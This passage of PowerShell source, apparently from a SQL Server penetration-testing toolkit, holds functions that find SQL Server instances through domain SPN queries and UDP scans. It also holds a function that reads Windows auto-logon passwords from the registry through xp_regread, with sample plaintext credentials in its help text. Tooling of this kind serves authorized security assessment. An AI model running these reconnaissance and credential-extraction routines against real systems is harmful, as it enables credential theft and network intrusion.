SQL Server clusters.')]\n        [switch]$CheckMgmt,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Timeout in seconds for UDP scans of management servers. Longer timeout = more accurate.')]\n        [int]$UDPTimeOut = 3\n    )\n\n    Begin\n    {\n        # Table for SPN output\n        $TblSQLServerSpns = New-Object -TypeName System.Data.DataTable\n        $null = $TblSQLServerSpns.Columns.Add('ComputerName')\n        $null = $TblSQLServerSpns.Columns.Add('Instance')\n        $null = $TblSQLServerSpns.Columns.Add('DomainAccountSid')\n        $null = $TblSQLServerSpns.Columns.Add('DomainAccount')\n        $null = $TblSQLServerSpns.Columns.Add('DomainAccountCn')\n        $null = $TblSQLServerSpns.Columns.Add('Service')\n        $null = $TblSQLServerSpns.Columns.Add('Spn')\n        $null = $TblSQLServerSpns.Columns.Add('LastLogon')\n        $null = $TblSQLServerSpns.Columns.Add('Description')\n\n        # Table for UDP scan results of management servers\n    }\n\n    Process\n    {\n        # Get list of SPNs for SQL Servers\n        Write-Verbose -Message 'Grabbing SPNs from the domain for SQL Servers (MSSQL*)...'\n        $TblSQLServers = Get-DomainSpn -DomainController $DomainController -Username $Username -Password $Password -Credential $Credential -ComputerName $ComputerName -DomainAccount $DomainAccount -SpnService 'MSSQL*' -SuppressVerbose | Where-Object -FilterScript {\n            $_.service -like 'MSSQL*'\n        }\n\n        Write-Verbose -Message 'Parsing SQL Server instances from SPNs...'\n\n        # Add column containing sql server instance\n        $TblSQLServers |\n        ForEach-Object -Process {\n            # Parse SQL Server instance\n            $Spn = $_.Spn\n            $Instance = $Spn.split('/')[1].split(':')[1]\n\n            # Check if the instance is a number and use the relevent delim\n            $Value = 0\n            if([int32]::TryParse($Instance,[ref]$Value))\n            {\n                $SpnServerInstance = $Spn -replace ':', ','\n            }\n            else\n            {\n                $SpnServerInstance = $Spn -replace ':', '\\'\n            }\n\n            $SpnServerInstance = $SpnServerInstance -replace 'MSSQLSvc/', ''\n\n            # Add SQL Server spn to table\n            $null = $TblSQLServerSpns.Rows.Add(\n                [string]$_.ComputerName,\n                [string]$SpnServerInstance,\n                $_.UserSid,\n                [string]$_.User,\n                [string]$_.Usercn,\n                [string]$_.Service,\n                [string]$_.Spn,\n                $_.LastLogon,\n            [string]$_.Description)\n        }\n\n        # Enumerate SQL Server instances from management servers\n        if($CheckMgmt)\n        {\n            Write-Verbose -Message 'Grabbing SPNs from the domain for Servers managing SQL Server clusters (MSServerClusterMgmtAPI)...'\n            $TblMgmtServers = Get-DomainSpn -DomainController $DomainController -Username $Username -Password $Password -Credential $Credential  -ComputerName $ComputerName -DomainAccount $DomainAccount -SpnService 'MSServerClusterMgmtAPI' -SuppressVerbose |\n            Where-Object -FilterScript {\n                $_.ComputerName -like '*.*'\n            } |\n            Select-Object -Property ComputerName -Unique |\n            Sort-Object -Property ComputerName\n\n            Write-Verbose -Message 'Performing a UDP scan of management servers to obtain managed SQL Server instances...'\n            $TblMgmtSQLServers = $TblMgmtServers |\n            Select-Object -Property ComputerName -Unique |\n            Get-SQLInstanceScanUDP -UDPTimeOut $UDPTimeOut\n        }\n    }\n\n    End\n    {\n        # Return data\n        if($CheckMgmt)\n        {\n            Write-Verbose -Message 'Parsing SQL Server instances from the UDP scan...'\n            $Tbl1 = $TblMgmtSQLServers |\n            Select-Object -Property ComputerName, Instance |\n            Sort-Object -Property ComputerName, Instance\n            $Tbl2 = $TblSQLServerSpns |\n            Select-Object -Property ComputerName, Instance |\n            Sort-Object -Property ComputerName, Instance\n            $Tbl3 = $Tbl1 + $Tbl2\n\n            $InstanceCount = $Tbl3.rows.count\n            Write-Verbose -Message \"$InstanceCount instances were found.\"\n            $Tbl3\n        }\n        else\n        {\n            $InstanceCount = $TblSQLServerSpns.rows.count\n            Write-Verbose -Message \"$InstanceCount instances were found.\"\n            $TblSQLServerSpns\n        }\n    }\n}\n\n\n# -------------------------------------------\n# Function:  Get-SQLInstanceLocal\n# -------------------------------------------\n# Author: Scott Sutherland\nFunction  Get-SQLInstanceLocal\n{\n    <#\n            .SYNOPSIS\n            Returns a list of the SQL Server instances found in the Windows registry for the local system.\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceLocal\n\n            ComputerName       : Computer1\n            Instance           : Computer1\\SQLEXPRESS\n            ServiceDisplayName : SQL Server (SQLEXPRESS)\n            ServiceName        : MSSQL$SQLEXPRESS\n            ServicePath        : \"C:\\Program Files\\Microsoft SQL Server\\MSSQL12.SQLEXPRESS\\MSSQL\\Binn\\sqlservr.exe\" -sSQLEXPRESS\n            ServiceAccount     : NT Service\\MSSQL$SQLEXPRESS\n            State              : Running\n\n            ComputerName       : Computer1\n            Instance           : Computer1\\STANDARDDEV2014\n            ServiceDisplayName : SQL Server (STANDARDDEV2014)\n            ServiceName        : MSSQL$STANDARDDEV2014\n            ServicePath        : \"C:\\Program Files\\Microsoft SQL Server\\MSSQL12.STANDARDDEV2014\\MSSQL\\Binn\\sqlservr.exe\" -sSTANDARDDEV2014\n            ServiceAccount     : LocalSystem\n            State              : Running\n\n            ComputerName       : Computer1\n            Instance           : Computer1\n            ServiceDisplayName : SQL Server (MSSQLSERVER)\n            ServiceName        : MSSQLSERVER\n            ServicePath        : \"C:\\Program Files\\Microsoft SQL Server\\MSSQL12.MSSQLSERVER\\MSSQL\\Binn\\sqlservr.exe\" -sMSSQLSERVER\n            ServiceAccount     : NT Service\\MSSQLSERVER\n            State              : Running\n\n    #>\n    Begin\n    {\n        # Table for output\n        $TblLocalInstances = New-Object -TypeName System.Data.DataTable\n        $null = $TblLocalInstances.Columns.Add('ComputerName')\n        $null = $TblLocalInstances.Columns.Add('Instance')\n        $null = $TblLocalInstances.Columns.Add('ServiceDisplayName')\n        $null = $TblLocalInstances.Columns.Add('ServiceName')\n        $null = $TblLocalInstances.Columns.Add('ServicePath')\n        $null = $TblLocalInstances.Columns.Add('ServiceAccount')\n        $null = $TblLocalInstances.Columns.Add('State')\n    }\n\n    Process\n    {\n        # Grab SQL Server services for the server\n        $SqlServices = Get-SQLServiceLocal | Where-Object -FilterScript {\n            $_.ServicePath -like '*sqlservr.exe*'\n        }\n\n        # Add recrds to SQL Server instance table\n        $SqlServices |\n        ForEach-Object -Process {\n            # Parse Instance\n            $ComputerName = [string]$_.ComputerName\n            $DisplayName = [string]$_.ServiceDisplayName\n\n            if($DisplayName)\n            {\n                $Instance = $ComputerName + '\\' +$DisplayName.split('(')[1].split(')')[0]\n                if($Instance -like '*\\MSSQLSERVER')\n                {\n                    $Instance = $ComputerName\n                }\n            }\n            else\n            {\n                $Instance = $ComputerName\n            }\n\n            # Add record\n            $null = $TblLocalInstances.Rows.Add(\n                [string]$_.ComputerName,\n                [string]$Instance,\n                [string]$_.ServiceDisplayName,\n                [string]$_.ServiceName,\n                [string]$_.ServicePath,\n                [string]$_.ServiceAccount,\n            [string]$_.ServiceState)\n        }\n    }\n\n    End\n    {\n\n        # Status User\n        $LocalInstanceCount = $TblLocalInstances.rows.count\n        Write-Verbose -Message \"$LocalInstanceCount local instances where found.\"\n\n        # Return data\n        $TblLocalInstances\n    }\n}\n\n\n# ----------------------------------\n#  Get-SQLInstanceScanUDP\n# ----------------------------------\n# Author: Eric Gruber\n# Note: Pipeline and timeout mods by Scott Sutherland\nfunction Get-SQLInstanceScanUDP\n{\n    <#\n            .SYNOPSIS\n            Returns a list of SQL Servers resulting from a UDP discovery scan of provided computers.\n            .PARAMETER ComputerName\n            Computer name or IP address to enumerate SQL Instance from.\n            .PARAMETER UDPTimeOut\n            Timeout in seconds. Longer timeout = more accurate.\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceScanUDP -Verbose -ComputerName SQLServer1.domain.com\n            VERBOSE:  - SQLServer1.domain.com - UDP Scan Start.\n            VERBOSE:  - SQLServer1.domain.com - UDP Scan Complete.\n\n            ComputerName : SQLServer1.domain.com\n            Instance     : SQLServer1.domain.com\\Express\n            InstanceName : Express\n            ServerIP     : 10.10.10.30\n            TCPPort      : 51663\n            BaseVersion  : 11.0.2100.60\n            IsClustered  : No\n\n            ComputerName : SQLServer1.domain.com\n            Instance     : SQLServer1.domain.com\\Standard\n            InstanceName : Standard\n            ServerIP     : 10.10.10.30\n            TCPPort      : 51861\n            BaseVersion  : 11.0.2100.60\n            IsClustered  : No\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceDomain | Get-SQLInstanceScanUDP -Verbose\n            VERBOSE:  - SQLServer1.domain.com - UDP Scan Start.\n            VERBOSE:  - SQLServer1.domain.com - UDP Scan Complete.\n\n\n            ComputerName : SQLServer1.domain.com\n            Instance     : SQLServer1.domain.com\\Express\n            InstanceName : Express\n            ServerIP     : 10.10.10.30\n            TCPPort      : 51663\n            BaseVersion  : 11.0.2100.60\n            IsClustered  : No\n\n            ComputerName : SQLServer1.domain.com\n            Instance     : SQLServer1.domain.com\\Standard\n            InstanceName : Standard\n            ServerIP     : 10.10.10.30\n            TCPPort      : 51861\n            BaseVersion  : 11.0.2100.60\n            IsClustered  : No\n            [TRUNCATED]\n    #>\n    [CmdletBinding()]\n    param(\n\n        [Parameter(Mandatory = $true,\n                ValueFromPipeline = $true,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Computer name or IP address to enumerate SQL Instance from.')]\n        [string]$ComputerName,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Timeout in seconds. Longer timeout = more accurate.')]\n        [int]$UDPTimeOut = 2,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose\n    )\n\n    Begin\n    {\n        # Setup data table for results\n        $TableResults = New-Object -TypeName system.Data.DataTable -ArgumentList 'Table'\n        $null = $TableResults.columns.add('ComputerName')\n        $null = $TableResults.columns.add('Instance')\n        $null = $TableResults.columns.add('InstanceName')\n        $null = $TableResults.columns.add('ServerIP')\n        $null = $TableResults.columns.add('TCPPort')\n        $null = $TableResults.columns.add('BaseVersion')\n        $null = $TableResults.columns.add('IsClustered')\n    }\n\n    Process\n    {\n        if(-not $SuppressVerbose)\n        {\n            Write-Verbose -Message \" - $ComputerName - UDP Scan Start.\"\n        }\n\n        # Verify server name isn't empty\n        if ($ComputerName -ne '')\n        {\n            # Try to enumerate SQL Server instances from remote system\n            try\n            {\n                # Resolve IP\n                $IPAddress = [System.Net.Dns]::GetHostAddresses($ComputerName)\n\n                # Create UDP client object\n                $UDPClient = New-Object -TypeName System.Net.Sockets.Udpclient\n\n                # Attempt to connect to system\n                $UDPTimeOutMilsec = $UDPTimeOut * 1000\n                $UDPClient.client.ReceiveTimeout = $UDPTimeOutMilsec\n                $UDPClient.Connect($ComputerName,0x59a)\n                $UDPPacket = 0x03\n\n                # Send request to system\n                $UDPEndpoint = New-Object -TypeName System.Net.Ipendpoint -ArgumentList ([System.Net.Ipaddress]::Any, 0)\n                $UDPClient.Client.Blocking = $true\n                [void]$UDPClient.Send($UDPPacket,$UDPPacket.Length)\n\n                # Process response from system\n                $BytesRecived = $UDPClient.Receive([ref]$UDPEndpoint)\n                $Response = [System.Text.Encoding]::ASCII.GetString($BytesRecived).split(';')\n\n                $values = @{}\n\n                for($i = 0; $i -le $Response.length; $i++)\n                {\n                    if(![string]::IsNullOrEmpty($Response[$i]))\n                    {\n                        $values.Add(($Response[$i].ToLower() -replace '[\\W]', ''),$Response[$i+1])\n                    }\n                    else\n                    {\n                        if(![string]::IsNullOrEmpty($values.'tcp'))\n                        {\n                            if(-not $SuppressVerbose)\n                            {\n                                $DiscoveredInstance = \"$ComputerName\\\"+$values.'instancename'\n                                Write-Verbose -Message \"$ComputerName - Found: $DiscoveredInstance\"\n                            }\n\n                            # Add SQL Server instance info to results table\n                            $null = $TableResults.rows.Add(\n                                [string]$ComputerName,\n                                [string]\"$ComputerName\\\"+$values.'instancename',\n                                [string]$values.'instancename',\n                                [string]$IPAddress,\n                                [string]$values.'tcp',\n                                [string]$values.'version',\n                            [string]$values.'isclustered')\n                            $values = @{}\n                        }\n                    }\n                }\n\n                # Close connection\n                $UDPClient.Close()\n            }\n            catch\n            {\n                #\"Error was $_\"\n                #$line = $_.InvocationInfo.ScriptLineNumber\n                #\"Error was in Line $line\"\n\n                # Close connection\n                # $UDPClient.Close()\n            }\n        }\n        if(-not $SuppressVerbose)\n        {\n            Write-Verbose -Message \" - $ComputerName - UDP Scan Complete.\"\n        }\n    }\n\n    End\n    {\n        # Return Results\n        $TableResults\n    }\n}\n\n\n# ----------------------------------\n#  Get-SQLInstanceScanUDPThreaded\n# ----------------------------------\n# Author: Eric Gruber\n# Note: Pipeline and timeout mods by Scott Sutherland\nfunction Get-SQLInstanceScanUDPThreaded\n{\n    <#\n            .SYNOPSIS\n            Returns a list of SQL Servers resulting from a UDP discovery scan of provided computers.\n            .PARAMETER ComputerName\n            Computer name or IP address to enumerate SQL Instance from.\n            .PARAMETER UDPTimeOut\n            Timeout in seconds. Longer timeout = more accurate.\n            .PARAMETER Threads\n            Number of concurrent host threads.\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceScanUDPThreaded -Verbose -ComputerName SQLServer1.domain.com\n            VERBOSE:  - SQLServer1.domain.com - UDP Scan Start.\n            VERBOSE:  - SQLServer1.domain.com - UDP Scan Complete.\n\n            ComputerName : SQLServer1.domain.com\n            Instance     : SQLServer1.domain.com\\Express\n            InstanceName : Express\n            ServerIP     : 10.10.10.30\n            TCPPort      : 51663\n            BaseVersion  : 11.0.2100.60\n            IsClustered  : No\n\n            ComputerName : SQLServer1.domain.com\n            Instance     : SQLServer1.domain.com\\Standard\n            InstanceName : Standard\n            ServerIP     : 10.10.10.30\n            TCPPort      : 51861\n            BaseVersion  : 11.0.2100.60\n            IsClustered  : No\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceDomain | Get-SQLInstanceScanUDP -Verbose -Threads 20\n            VERBOSE:  - SQLServer1.domain.com - UDP Scan Start.\n            VERBOSE:  - SQLServer1.domain.com - UDP Scan Complete.\n\n\n            ComputerName : SQLServer1.domain.com\n            Instance     : SQLServer1.domain.com\\Express\n            InstanceName : Express\n            ServerIP     : 10.10.10.30\n            TCPPort      : 51663\n            BaseVersion  : 11.0.2100.60\n            IsClustered  : No\n\n            ComputerName : SQLServer1.domain.com\n            Instance     : SQLServer1.domain.com\\Standard\n            InstanceName : Standard\n            ServerIP     : 10.10.10.30\n            TCPPort      : 51861\n            BaseVersion  : 11.0.2100.60\n            IsClustered  : No\n            [TRUNCATED]\n    #>\n\n    [CmdletBinding()]\n    param(\n\n        [Parameter(Mandatory = $true,\n                ValueFromPipeline = $true,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Computer name or IP address to enumerate SQL Instance from.')]\n        [string]$ComputerName,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Timeout in seconds. Longer timeout = more accurate.')]\n        [int]$UDPTimeOut = 2,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Number of threads.')]\n        [int]$Threads = 5,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose\n    )\n\n    Begin\n    {\n        # Setup data table for results\n        $TableResults = New-Object -TypeName system.Data.DataTable -ArgumentList 'Table'\n        $null = $TableResults.columns.add('ComputerName')\n        $null = $TableResults.columns.add('Instance')\n        $null = $TableResults.columns.add('InstanceName')\n        $null = $TableResults.columns.add('ServerIP')\n        $null = $TableResults.columns.add('TCPPort')\n        $null = $TableResults.columns.add('BaseVersion')\n        $null = $TableResults.columns.add('IsClustered')\n        $TableResults.Clear()\n\n        # Setup data table for pipeline threading\n        $PipelineItems = New-Object -TypeName System.Data.DataTable\n\n        # Ensure provide instance is processed\n        if($Instance)\n        {\n            $ProvideInstance = New-Object -TypeName PSObject -Property @{\n                Instance = $Instance\n            }\n            $PipelineItems = $PipelineItems + $ProvideInstance\n        }\n    }\n\n    Process\n    {\n        # Create list of pipeline items\n        $PipelineItems = $PipelineItems + $_\n    }\n\n    End\n    {\n        # Define code to be multi-threaded\n        $MyScriptBlock = {\n            $ComputerName = $_.ComputerName\n\n            if(-not $SuppressVerbose)\n            {\n                Write-Verbose -Message \" - $ComputerName - UDP Scan Start.\"\n            }\n\n\n            # Verify server name isn't empty\n            if ($ComputerName -ne '')\n            {\n                # Try to enumerate SQL Server instances from remote system\n                try\n                {\n                    # Resolve IP\n                    $IPAddress = [System.Net.Dns]::GetHostAddresses($ComputerName)\n\n                    # Create UDP client object\n                    $UDPClient = New-Object -TypeName System.Net.Sockets.Udpclient\n\n                    # Attempt to connect to system\n                    $UDPTimeOutMilsec = $UDPTimeOut * 1000\n                    $UDPClient.client.ReceiveTimeout = $UDPTimeOutMilsec\n                    $UDPClient.Connect($ComputerName,0x59a)\n                    $UDPPacket = 0x03\n\n                    # Send request to system\n                    $UDPEndpoint = New-Object -TypeName System.Net.Ipendpoint -ArgumentList ([System.Net.Ipaddress]::Any, 0)\n                    $UDPClient.Client.Blocking = $true\n                    [void]$UDPClient.Send($UDPPacket,$UDPPacket.Length)\n\n                    # Process response from system\n                    $BytesRecived = $UDPClient.Receive([ref]$UDPEndpoint)\n                    $Response = [System.Text.Encoding]::ASCII.GetString($BytesRecived).split(';')\n\n                    $values = @{}\n\n                    for($i = 0; $i -le $Response.length; $i++)\n                    {\n                        if(![string]::IsNullOrEmpty($Response[$i]))\n                        {\n                            $values.Add(($Response[$i].ToLower() -replace '[\\W]', ''),$Response[$i+1])\n                        }\n                        else\n                        {\n                            if(![string]::IsNullOrEmpty($values.'tcp'))\n                            {\n                                if(-not $SuppressVerbose)\n                                {\n                                    $DiscoveredInstance = \"$ComputerName\\\"+$values.'instancename'\n                                    Write-Verbose -Message \" - $ComputerName - Found: $DiscoveredInstance\"\n                                }\n\n                                # Add SQL Server instance info to results table\n                                $null = $TableResults.rows.Add(\n                                    [string]$ComputerName,\n                                    [string]\"$ComputerName\\\"+$values.'instancename',\n                                    [string]$values.'instancename',\n                                    [string]$IPAddress,\n                                    [string]$values.'tcp',\n                                    [string]$values.'version',\n                                [string]$values.'isclustered')\n                                $values = @{}\n                            }\n                        }\n                    }\n\n                    # Close connection\n                    $UDPClient.Close()\n                }\n                catch\n                {\n                    #\"Error was $_\"\n                    #$line = $_.InvocationInfo.ScriptLineNumber\n                    #\"Error was in Line $line\"\n\n                    # Close connection\n                    # $UDPClient.Close()\n                }\n            }\n\n            if(-not $SuppressVerbose)\n            {\n                Write-Verbose -Message \" - $ComputerName - UDP Scan End.\"\n            }\n        }\n\n        # Run scriptblock using multi-threading\n        $PipelineItems | Invoke-Parallel -ScriptBlock $MyScriptBlock -ImportSessionFunctions -ImportVariables -Throttle $Threads -RunspaceTimeout 2 -Quiet -ErrorAction SilentlyContinue\n\n        return $TableResults\n    }\n}\n\n# ----------------------------------\n#  Get-SQLInstanceFile\n# ----------------------------------\n# Author: Scott Sutherland\nFunction  Get-SQLInstanceFile\n{\n    <#\n            .SYNOPSIS\n            Returns a list of SQL Server instances from a file.\n            One per line. Three instance formats supported:\n            1 - computername\n            2 - computername\\instance\n            3 - computername,1433\n            .PARAMETER FilePath\n            Path to file containing instances.  One per line.\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceFile -Verbose -FilePath c:\\temp\\servers.txt\n            VERBOSE: Importing instances from file path.\n            VERBOSE: 3 instances where found in c:\\temp\\servers.txt.\n\n            ComputerName   Instance\n            ------------   --------\n            Computer1      Computer1\\SQLEXPRESS\n            Computer1      Computer1\\STANDARDDEV2014\n            Computer1      Computer1\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $true,\n        HelpMessage = 'The file path.')]\n        [string]$FilePath\n    )\n\n    Begin\n    {\n        # Table for output\n        $TblFileInstances = New-Object -TypeName System.Data.DataTable\n        $null = $TblFileInstances.Columns.Add('ComputerName')\n        $null = $TblFileInstances.Columns.Add('Instance')\n    }\n\n    Process\n    {\n        # Test file path\n        if(Test-Path $FilePath)\n        {\n            Write-Verbose -Message 'Importing instances from file path.'\n        }\n        else\n        {\n            Write-Output -InputObject 'File path does not appear to be valid.'\n            break\n        }\n\n        # Grab lines from file\n        Get-Content -Path $FilePath |\n        ForEach-Object -Process {\n            $Instance = $_\n            if($Instance.Split(',')[1])\n            {\n                $ComputerName = $Instance.Split(',')[0]\n            }\n            else\n            {\n                $ComputerName = $Instance.Split('\\')[0]\n            }\n\n            # Add record\n            if($_ -ne '')\n            {\n                $null = $TblFileInstances.Rows.Add($ComputerName,$Instance)\n            }\n        }\n    }\n\n    End\n    {\n\n        # Status User\n        $FileInstanceCount = $TblFileInstances.rows.count\n        Write-Verbose -Message \"$FileInstanceCount instances where found in $FilePath.\"\n\n        # Return data\n        $TblFileInstances\n    }\n}\n#endregion\n\n#########################################################################\n#\n#region          PASSWORD RECOVERY FUNCTIONS\n#\n#########################################################################\n\n# ----------------------------------\n#  Get-SQLRecoverPwAutoLogon\n# ----------------------------------\n# Author: Scott Sutherland\nFunction   Get-SQLRecoverPwAutoLogon\n{\n    <#\n            .SYNOPSIS\n            Returns the Windows auto login credentials through SQL Server using xp_regread. \n            This requires sysadmin privileges.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .Example\n            PS C:\\> Get-SQLInstanceLocal |  Get-SQLRecoverPwAutoLogon -Verbose\n            VERBOSE: SQLServer1\\SQLEXPRESS : Connection Success.\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : Connection Success.\n            VERBOSE: SQLServer1 : Connection Success.\n\n\n            ComputerName : SQLServer1\n            Instance     : SQLServer1\\SQLEXPRESS\n            Domain       : Demo\n            UserName     : KioskAdmin\n            Password     : KioskPassword!\n\n            ComputerName : SQLServer1\n            Instance     : SQLServer1\\SQLEXPRESS\n            Domain       : Demo\n            UserName     : kioskuser\n            Password     : KioskUserPassword!\n\n            .Example\n            PS C:\\> Get-SQLRecoverPwAutoLogon -Verbose -instance SQLServer1\\STANDARDDEV2014\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : Connection Success.\n\n\n            ComputerName : SQLServer1\n            Instance     : SQLServer1\\STANDARDDEV2014\n            Domain       : localhost\n            UserName     : KioskAdmin\n            Password     : KioskPassword!\n\n            ComputerName : SQLServer1\n            Instance     : SQLServer1\\STANDARDDEV2014\n            Domain       : localhost2\n            UserName     : kioskuser\n            Password     : KioskUserPassword!\n\n            .Notes\n            https://support.microsoft.com/en-us/kb/321185\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose\n    )\n\n    Begin\n    {\n        # Table for output\n        $TblWinAutoCreds = New-Object -TypeName System.Data.DataTable\n        $TblWinAutoCreds.Columns.Add(\"ComputerName\") | Out-Null\n        $TblWinAutoCreds.Columns.Add(\"Instance\") | Out-Null\n        $TblWinAutoCreds.Columns.Add(\"Domain\") | Out-Null\n        $TblWinAutoCreds.Columns.Add(\"UserName\") | Out-Null\n        $TblWinAutoCreds.Columns.Add(\"Password\") | Out-Null\n    }\n\n    Process\n    {\n        # Parse computer name from the instance\n        $ComputerName = Get-ComputerNameFromInstance -Instance $Instance\n\n        # Default connection to local default instance\n        if(-not $Instance)\n        {\n            $Instance = $env:COMPUTERNAME\n        }\n\n        # Test connection to instance\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if($TestConnection)\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Success.\"\n            }\n        }\n        else\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Failed.\"\n            }\n            return\n        }       \n\n        # Get sysadmin status\n        $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin\n\n        # Get SQL Server version number\n        $SQLVersionFull = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property SQLServerVersionNumber -ExpandProperty SQLServerVersionNumber\n        if($SQLVersionFull)\n        {\n            $SQLVersionShort = $SQLVersionFull.Split('.')[0]\n        }\n\n        # Check if this can actually run with the current login\n        if($IsSysadmin -ne \"Yes\")\n        {          \n            Write-Verbose \"$Instance : This function requires sysadmin privileges. Done.\"\n            Return\n        }\n\n        # Get default auto login Query\n        $DefaultQuery = \"\n        -------------------------------------------------------------------------\n        -- Get Windows Auto Login Credentials from the Registry\n        -------------------------------------------------------------------------\n\n        -- Get AutoLogin Default Domain\n        DECLARE @AutoLoginDomain  SYSNAME\n        EXECUTE master.dbo.xp_regread\n        @rootkey\t\t= N'HKEY_LOCAL_MACHINE',\n        @key\t\t\t= N'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon',\n        @value_name\t\t= N'DefaultDomainName',\n        @value\t\t\t= @AutoLoginDomain output\n\n        -- Get AutoLogin DefaultUsername\n        DECLARE @AutoLoginUser  SYSNAME\n        EXECUTE master.dbo.xp_regread\n        @rootkey\t\t= N'HKEY_LOCAL_MACHINE',\n        @key\t\t\t= N'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon',\n        @value_name\t\t= N'DefaultUserName',\n        @value\t\t\t= @AutoLoginUser output\n\n        -- Get AutoLogin DefaultUsername\n        DECLARE @AutoLoginPassword  SYSNAME\n        EXECUTE master.dbo.xp_regread\n        @rootkey\t\t= N'HKEY_LOCAL_MACHINE',\n        @key\t\t\t= N'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon',\n        @value_name\t\t= N'DefaultPassword',\n        @value\t\t\t= @AutoLoginPassword output\n\n        -- Display Results\n        SELECT Domain = @AutoLoginDomain, Username = @AutoLoginUser, Password = @AutoLoginPassword\"\n\n        # Execute Default Query\n        $DefaultResults = Get-SQLQuery -Instance $Instance -Query $DefaultQuery -Username $Username -Password $Password -Credential $Credential -SuppressVerbose     \n        $DefaultUsername = $DefaultResults.Username\n        if($DefaultUsername.length -ge 2){\n\n            # Add record to data table\n            $DefaultResults | ForEach-Object{                \n                $TblWinAutoCreds.Rows.Add($ComputerName, $Instance,$_.Domain,$_.Username,$_.Password) | Out-Null\n            }                    \n        }else{\n            Write-Verbose \"$Instance : No default auto login credentials found.\"\n        }\n\n        # Get default alt auto login Query\n        $AltQuery = \"\n        -------------------------------------------------------------------------\n        -- Get Alternative Windows Auto Login Credentials from the Registry\n        -------------------------------------------------------------------------\n\n        -- Get Alt AutoLogin Default Domain\n        DECLARE @AltAutoLoginDomain  SYSNAME\n        EXECUTE master.dbo.xp_regread\n        @rootkey\t\t= N'HKEY_LOCAL_MACHINE',\n        @key\t\t\t= N'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon',\n        @value_name\t\t= N'AltDefaultDomainName',\n        @value\t\t\t= @AltAutoLoginDomain output\n\n        -- Get Alt AutoLogin DefaultUsername\n        DECLARE @AltAutoLoginUser  SYSNAME\n        EXECUTE master.dbo.xp_regread\n        @rootkey\t\t= N'HKEY_LOCAL_MACHINE',\n        @key\t\t\t= N'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon',\n        @value_name\t\t= N'AltDefaultUserName',\n        @value\t\t\t= @AltAutoLoginUser output\n\n        -- Get Alt AutoLogin DefaultUsername\n        DECLARE @AltAutoLoginPassword  SYSNAME\n        EXECUTE master.dbo.xp_regread\n        @rootkey\t\t= N'HKEY_LOCAL_MACHINE',\n        @key\t\t\t= N'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon',\n        @value_name\t\t= N'AltDefaultPassword',\n        @value\t\t\t= @AltAutoLoginPassword output\n\n        -- Display Results\n        SELECT Domain = @AltAutoLoginDomain, Username = @AltAutoLoginUser, Password = @AltAutoLoginPassword\"\n\n        # Execute Default Query\n        $AltResults = Get-SQLQuery -Instance $Instance -Query $AltQuery -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n        $AltUsername = $AltResults.Username\n        if($AltUsername.length -ge 2){                            \n\n             # Add record to data table\n            $AltResults | ForEach-Object{               \n                $TblWinAutoCreds.Rows.Add($ComputerName, $Instance,$_.Domain,$_.Username,$_.Password) | Out-Null\n            }\n        }else{\n            Write-Verbose \"$Instance : No alternative auto login credentials found.\"\n        }\n    }\n\n    End\n    {\n        # Return data\n         $TblWinAutoCreds \n    }\n}\n\n\n# ----------------------------------\n#  Get-SQLServerPasswordHash\n# ----------------------------------\n# Author: Mike Manzotti (@mmanzo_)\nFunction  Get-SQLServerPasswordHash\n{\n    <#\n            .SYNOPSIS\n            Returns logins from 